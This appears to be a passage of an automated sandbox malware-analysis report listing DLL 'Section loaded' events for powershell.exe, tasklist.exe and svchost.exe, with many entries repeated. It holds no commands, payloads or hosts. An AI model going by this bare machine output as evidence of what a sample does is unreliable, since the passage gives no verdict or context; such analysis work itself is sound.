                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
